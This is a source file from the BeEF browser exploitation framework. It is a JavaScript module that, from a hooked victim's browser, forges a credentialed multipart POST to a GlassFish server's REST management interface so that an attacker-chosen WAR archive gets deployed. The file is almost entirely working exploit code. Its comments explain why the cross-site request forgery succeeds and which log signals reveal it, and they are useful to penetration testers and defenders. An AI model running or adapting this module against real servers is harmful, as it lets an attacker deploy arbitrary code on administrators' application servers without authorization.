beefproject
GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/glassfish_war_upload_xsrf/command.js
//
// Copyright (c) 2006-2026 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// This exploit is based on the PoC by Roberto Suggi Liverani - Security-Assessment.com
// For more info, refer to: http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html
beef.execute(function() {
// Module options. The <%= ... %> tags are filled in server-side before this
// script is delivered, so each value arrives here as a plain string literal.
//   restHost - prefix (scheme, host, port) that logUrl is built on.
//   warName  - file name sent in the multipart file part.
//   warBase  - base64 text of the archive; decoded with atob() in addFileField.
// NOTE(review): the values are placed raw inside single-quoted literals; whether
// quotes and backslashes are escaped before substitution is not visible in this file.
var restHost = '<%= @restHost %>',
    warName = '<%= @warName %>',
    warBase = '<%= @warBase %>';

// Application-deployment resource of the REST management interface; this is the
// only URL the module sends a request to.
var logUrl = restHost + '/management/domain/applications/application';
// Fallback for the non-standard XMLHttpRequest#sendAsBinary, installed only when
// the browser does not already provide it. The argument is treated as a byte
// string: each UTF-16 code unit is cut down to its low 8 bits and the resulting
// bytes are sent as an ArrayBuffer, so the body reaches the wire unmodified by
// any text encoding step.
if (typeof XMLHttpRequest.prototype.sendAsBinary === 'undefined' && Uint8Array) {
  XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
    var total = datastr.length;
    var bytes = new Uint8Array(total);
    for (var k = 0; k < total; k++) {
      bytes[k] = datastr.charCodeAt(k) & 0xff;
    }
    this.send(bytes.buffer);
  };
}
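// fileUpload(fileData, fileName)
//
// Assembles a multipart/form-data body by hand and POSTs it to logUrl with the
// browser's stored credentials for that origin attached.
//
//   fileData - base64 text of the archive; decoded in addFileField.
//   fileName - file name written into the file part's header.
//   returns  - always true; the outcome of the request is not inspected.
//
// Why the request goes through as a cross-site request forgery (see the advisory
// linked in the file header): nothing in it has to come from the target.
// "multipart/form-data" is a Content-Type browsers send cross-origin without a
// CORS preflight, and withCredentials makes the browser attach whatever session
// it holds for restHost. A server that demands an unguessable anti-CSRF token on
// state-changing REST calls, or a custom header that forces a preflight, is not
// exposed to a request built this way.
//
// Detection notes: the boundary is a fixed literal, so every request from this
// module carries the same "boundary=" value in its Content-Type header, and the
// part names are the fixed list below followed by a file part named "id". A POST
// to the deployment resource whose Origin or Referer is not the admin console
// itself is the other signal to look for in proxy and server logs.
function fileUpload(fileData, fileName) {
  // Function-local on purpose: assigning these names without a declaration
  // would create globals on the page's window object.
  var boundary = "HELLOWORLD270883142628617";
  var uri = logUrl;
  var xhr = new XMLHttpRequest();

  // Form fields sent ahead of the file part, in this order. The values are
  // fixed strings; their meaning is defined by the server, not by this file.
  var additionalFields = {
    asyncreplication: "true",
    availabilityenabled: "false",
    contextroot: "",
    createtables: "true",
    dbvendorname: "",
    deploymentplan: "",
    description: "",
    dropandcreatetables: "true",
    enabled: "true",
    force: "false",
    generatermistubs: "false",
    isredeploy: "false",
    keepfailedstubs: "false",
    keepreposdir: "false",
    keepstate: "true",
    lbenabled: "true",
    libraries: "",
    logReportedErrors: "true",
    name: "",
    precompilejsp: "false",
    properties: "",
    property: "",
    retrieve: "",
    target: "",
    type: "",
    uniquetablenames: "true",
    verify: "false",
    virtualservers: "",
    __remove_empty_entries__: "true"
  };

  var fileFieldName = "id";
  xhr.open("POST", uri, true);
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + boundary); // simulate a file MIME POST request.
  // A real boolean; the property is a boolean flag, so the string "true" only
  // worked through coercion.
  xhr.withCredentials = true;
  xhr.onreadystatechange = function() {
    // readyState 4 is reached on failure as well as on success, and neither
    // xhr.status nor the response is examined: the message below means only
    // that the request finished.
    if (xhr.readyState == 4) {
      beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Attempt to deploy \"' + warName + '\" completed.');
    }
  };

  var body = "";

  for (var i in additionalFields) {
    if (additionalFields.hasOwnProperty(i)) {
      body += addField(i, additionalFields[i], boundary);
    }
  }

  body += addFileField(fileFieldName, fileData, fileName, boundary);
  body += "--" + boundary + "--"; // closing delimiter of the multipart body
  // Content-Length is a header browsers do not let script set; the call is kept
  // as written and the browser computes the real length itself.
  xhr.setRequestHeader('Content-length', body.length);
  xhr.sendAsBinary(body);
  return true;
}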
// addField(name, value, boundary)
//
// Renders one plain form field as a multipart/form-data part: the delimiter
// line, a Content-Disposition header naming the field, a blank line, the value,
// and a trailing CRLF.
//
// name and value are inserted verbatim, with no quoting or CRLF filtering. In
// this file every caller passes the literal keys and values of additionalFields.
function addField(name, value, boundary) {
  var delimiterLine = "--" + boundary + "\r\n";
  var dispositionLine = 'Content-Disposition: form-data; name="' + name + '"\r\n';
  return delimiterLine + dispositionLine + "\r\n" + value + "\r\n";
}
// addFileField(name, value, filename, boundary)
//
// Renders the file part of the multipart body: delimiter line,
// Content-Disposition with field name and file name, a fixed
// application/octet-stream Content-Type, a blank line, the decoded content,
// and a trailing CRLF.
//
// value is base64 text. atob() turns it into a string holding one character per
// byte, which is the form sendAsBinary expects. name and filename are inserted
// verbatim, without quoting.
function addFileField(name, value, filename, boundary) {
  var partHeader =
    "--" + boundary + "\r\n" +
    'Content-Disposition: form-data; name="' + name + '"; filename="' + filename + '"\r\n' +
    "Content-Type: application/octet-stream\r\n\r\n";
  var decoded = atob(value);
  return partHeader + decoded + "\r\n";
}
// Entry point: sends the single deployment request, passing the base64 archive
// text (warBase) as the file content and warName as its file name.
function start() {
  fileUpload(warBase, warName);
}

// Runs once, as soon as the command body is executed in the page.
start();
});